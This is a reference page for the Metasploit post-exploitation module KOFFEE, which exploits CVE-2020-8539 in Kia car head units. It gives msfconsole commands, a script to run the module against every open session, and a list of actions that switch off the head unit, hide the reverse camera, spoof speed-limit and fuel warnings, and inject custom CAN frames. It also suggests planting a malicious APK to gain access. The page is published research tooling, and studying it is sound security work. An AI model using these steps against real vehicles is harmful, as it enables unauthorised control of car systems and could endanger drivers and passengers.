KOFFEE - Kia OFFensivE Exploit - Metasploit
This page contains detailed information about how to use the post/android/local/koffee metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: KOFFEE - Kia OFFensivE Exploit
Module: post/android/local/koffee
Source code: modules/post/android/local/koffee.rb
Disclosure date: 2020-12-02
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): Android
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2020-8539
This module exploits CVE-2020-8539, which is an arbitrary code execution vulnerability that allows an to attacker execute the micomd binary file on the head unit of Kia Motors. This module has been tested on SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software versions. This module, run on an active session, allows an attacker to send crafted micomd commands that allow the attacker to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/android/local/koffee
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/android/local/koffee
msf post(koffee) > show options
... show and set options ...
msf post(koffee) > set SESSION session-id
msf post(koffee) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/android/local/koffee")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
KOFFEE exploits the CVE-2020-8539, which is an Arbitrary Code Execution vulnerability that allows a user to execute the
micomd
binary with valid payloads on Kia Motors Head Units. By using KOFFEE an attacker can send crafted micomd
commands to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle.
Vulnerable Head Unit software versions
- SOP.003.30.180703
- SOP.005.7.181019
- SOP.007.1.191209
Verification Steps
- [ ] Start
msfconsole
- [ ]
use post/android/local/koffee
- [ ]
set session 1
- [ ]
toogle_radio_mute
orrun
What do you need
- An active session with the Head Unit
Options
MICOMD
It contains the path to micomd executable
NUM_MSG
It expresses the number of MICOM commands sent each time
PERIOD
It indicates the time (ms) interval between two MICOM commands, aka Period of CAN frames
SESSION
It refers to the metasploit session number on which this module is run.
CMD_PAYLOAD
It refers to the Micom payload to be injected, e.g., cmd byte1 byte3 byte2'. By default it is set to 00 00 00
. This
options works only for the INJECT_CUSTOM
action
Actions
The following actions can be triggered on the Head Unit. An action can be triggered by inserting in the Metasploit input
console the action name in lowercase, e.g., camera_reverse_off
.
- CAMERA_REVERSE_OFF: It hides the parking camera video stream
- CAMERA_REVERSE_ON: It shows the parking camera video stream
- CLUSTER_CHANGE_LANGUAGE: It changes the cluster language
- CLUSTER_RADIO_INFO: It shows radio info in the instrument cluster
- CLUSTER_RANDOM_NAVIGATION: It shows navigation signals in the instrument cluster
- CLUSTER_ROUNDABOUT_FARAWAY: It shows a round about signal with variable distance in the instrument cluster
- CLUSTER_SPEED_LIMIT: It changes the speed limit shown in the instrument cluster
- HIGH_SCREEN_BRIGHTNESS: It increases the head unit screen brightness
- INJECT_CUSTOM: It injects custom micom payloads
- LOW_FUEL_WARNING: It pops up a low fuel message on the head unit
- LOW_SCREEN_BRIGHTNESS: It decreases the head unit screen brightness
- MAX_RADIO_VOLUME: It sets the radio volume to the max
- NAVIGATION_FULL_SCREEN: It pops up the navigation app
- REDUCE_RADIO_VOLUME: It reduces radio volume
- SEEK_DOWN_SEARCH: It triggers the seek down radio frequency search
- SEEK_UP_SEARCH: It triggers the seek up radio frequency search
- SET_NAVIGATION_ADDRESS: It pops up the navigation address window
- SWITCH_OFF_Hu: It switches off the head unit
- SWITCH_ON_Hu: It switches on the head unit
- TOGGLE_RADIO_MUTE It mutes/unmutes the radio
An action can be also triggered using the commands:
- [ ] set action CAMERA_REVERSE_ON
- [ ] run
To execute the INJECT_CUSTOM
action, you may want also to set up the right payload.
The commands to use to trigger this action are
- [ ] set action INJECT_CUSTOM
- [ ] set CMD_PAYLOAD 01 FF
- [ ] run
Scenarios
KOFFEE can be run as post-exploitation module when an active session is available with the Head Unit (HU). First, an attacker may create a malicious apk to generate a remote connection with the HU. For instance, using msfvenom or other tools, an attacker can create the malicious apk that, once installed in the HU, starts an active session. Now, the attacker is able to use the KOFFEE exploit to take control of the HU and inject CAN bus frames into the M-CAN bus of the vehicle.
Usage
msf6 > use post/android/local/koffee
msf6 post(android/local/koffee) > set session 1
session => 1
msf6 post(android/local/koffee) > toggle_radio_mute
[*] -- Starting action --
[*] -- Mute/umute radio --
[+] -- Command Sent --
Go back to menu.
Msfconsole Usage
Here is how the android/local/koffee post exploitation module looks in the msfconsole:
msf6 > use post/android/local/koffee
msf6 post(android/local/koffee) > show info
Name: KOFFEE - Kia OFFensivE Exploit
Module: post/android/local/koffee
Platform: Android
Arch:
Rank: Normal
Disclosed: 2020-12-02
Provided by:
Gianpiero Costantino
Ilaria Matteucci
Compatible session types:
Meterpreter
Available actions:
Name Description
---- -----------
CAMERA_REVERSE_OFF It hides the parking camera video stream
CAMERA_REVERSE_ON It shows the parking camera video stream
CLUSTER_CHANGE_LANGUAGE It changes the cluster language
CLUSTER_RADIO_INFO It shows radio info in the instrument cluster
CLUSTER_RANDOM_NAVIGATION It shows navigation signals in the instrument cluster
CLUSTER_ROUNDABOUT_FARAWAY It shows a round about signal with variable distance in the instrument cluster
CLUSTER_SPEED_LIMIT It changes the speed limit shown in the instrument cluster
HIGH_SCREEN_BRIGHTNESS It increases the head unit screen brightness
INJECT_CUSTOM It injects custom micom payloads
LOW_FUEL_WARNING It pops up a low fuel message on the head unit
LOW_SCREEN_BRIGHTNESS It decreases the head unit screen brightness
MAX_RADIO_VOLUME It sets the radio volume to the max
NAVIGATION_FULL_SCREEN It pops up the navigation app window
REDUCE_RADIO_VOLUME It decreases the radio volume
SEEK_DOWN_SEARCH It triggers the seek down radio frequency search
SEEK_UP_SEARCH It triggers the seek up radio frequency search
SET_NAVIGATION_ADDRESS It pops up the navigation address window
SWITCH_OFF_HU It switches off the head unit
SWITCH_ON_HU It switches on the head unit
TOGGLE_RADIO_MUTE It mutes/umutes the radio
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
MICOMD /system/bin/micomd yes Path to micomd executable
NUM_MSG 5 yes Number of MICOM commands sent each time
PERIOD 0.200 yes Time (ms) interval between two MICOM commands, aka Period of CAN frames
SESSION yes The session to run this module on.
Description:
This module exploits CVE-2020-8539, which is an arbitrary code
execution vulnerability that allows an to attacker execute the
micomd binary file on the head unit of Kia Motors. This module has
been tested on SOP.003.30.18.0703, SOP.005.7.181019 and
SOP.007.1.191209 head unit software versions. This module, run on an
active session, allows an attacker to send crafted micomd commands
that allow the attacker to control the head unit and send CAN bus
frames into the Multimedia CAN (M-Can) of the vehicle.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-8539
https://sowhat.iit.cnr.it/pdf/IIT-20-2020.pdf
Module Options
This is a complete list of options available in the android/local/koffee post exploitation module:
msf6 post(android/local/koffee) > show options
Module options (post/android/local/koffee):
Name Current Setting Required Description
---- --------------- -------- -----------
MICOMD /system/bin/micomd yes Path to micomd executable
NUM_MSG 5 yes Number of MICOM commands sent each time
PERIOD 0.200 yes Time (ms) interval between two MICOM commands, aka Period of CAN frames
SESSION yes The session to run this module on.
Post action:
Name Description
---- -----------
TOGGLE_RADIO_MUTE It mutes/umutes the radio
Advanced Options
Here is a complete list of advanced options supported by the android/local/koffee post exploitation module:
msf6 post(android/local/koffee) > show advanced
Module advanced options (post/android/local/koffee):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the android/local/koffee module can do:
msf6 post(android/local/koffee) > show actions
Post actions:
Name Description
---- -----------
CAMERA_REVERSE_OFF It hides the parking camera video stream
CAMERA_REVERSE_ON It shows the parking camera video stream
CLUSTER_CHANGE_LANGUAGE It changes the cluster language
CLUSTER_RADIO_INFO It shows radio info in the instrument cluster
CLUSTER_RANDOM_NAVIGATION It shows navigation signals in the instrument cluster
CLUSTER_ROUNDABOUT_FARAWAY It shows a round about signal with variable distance in the instrument cluster
CLUSTER_SPEED_LIMIT It changes the speed limit shown in the instrument cluster
HIGH_SCREEN_BRIGHTNESS It increases the head unit screen brightness
INJECT_CUSTOM It injects custom micom payloads
LOW_FUEL_WARNING It pops up a low fuel message on the head unit
LOW_SCREEN_BRIGHTNESS It decreases the head unit screen brightness
MAX_RADIO_VOLUME It sets the radio volume to the max
NAVIGATION_FULL_SCREEN It pops up the navigation app window
REDUCE_RADIO_VOLUME It decreases the radio volume
SEEK_DOWN_SEARCH It triggers the seek down radio frequency search
SEEK_UP_SEARCH It triggers the seek up radio frequency search
SET_NAVIGATION_ADDRESS It pops up the navigation address window
SWITCH_OFF_HU It switches off the head unit
SWITCH_ON_HU It switches on the head unit
TOGGLE_RADIO_MUTE It mutes/umutes the radio
Evasion Options
Here is the full list of possible evasion options supported by the android/local/koffee post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(android/local/koffee) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
The <NAME> option is required by the <ACTION.NAME> action.
Here is a relevant code snippet related to the "The <NAME> option is required by the <ACTION.NAME> action." error message:
104: # all conditional options are required when active, make sure none of them are blank
105: options.each_pair do |name, option|
106: next if option.conditions.empty?
107: next unless Msf::OptCondition.show_option(self, option)
108:
109: fail_with(Failure::BadConfig, "The #{name} option is required by the #{action.name} action.") if datastore[name].blank?
110: end
111: print_status(' -- Starting action -- ')
112: send("action_#{action.name.downcase}")
113: end
114:
No distance
Here is a relevant code snippet related to the "No distance" error message:
212: send_out_custom('4D1 66 00 00 00 14 86 20 00')
213: print_status(' -- ft -- ')
214: send_out_custom('4D1 66 00 00 00 14 86 30 00')
215: print_status(' -- yd -- ')
216: send_out_custom('4D1 66 00 00 00 14 86 40 00')
217: print_status(' -- No distance -- ')
218: send_out_custom('4D1 66 00 00 00 14 86 50 00')
219: end
220:
221: def action_cluster_random_navigation
222: print_status(' -- Calculating the route -- ')
Go back to menu.
Related Pull Requests
- #15021 Merged Pull Request: KOFFEE first commit. This module exploits the Arbitrary Code Executio…
References
See Also
Check also the following modules related to this module:
- post/android/capture/screen
- post/android/gather/hashdump
- post/android/gather/sub_info
- post/android/gather/wireless_ap
- post/android/manage/remove_lock
- post/android/manage/remove_lock_root
Authors
- Gianpiero Costantino
- Ilaria Matteucci
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.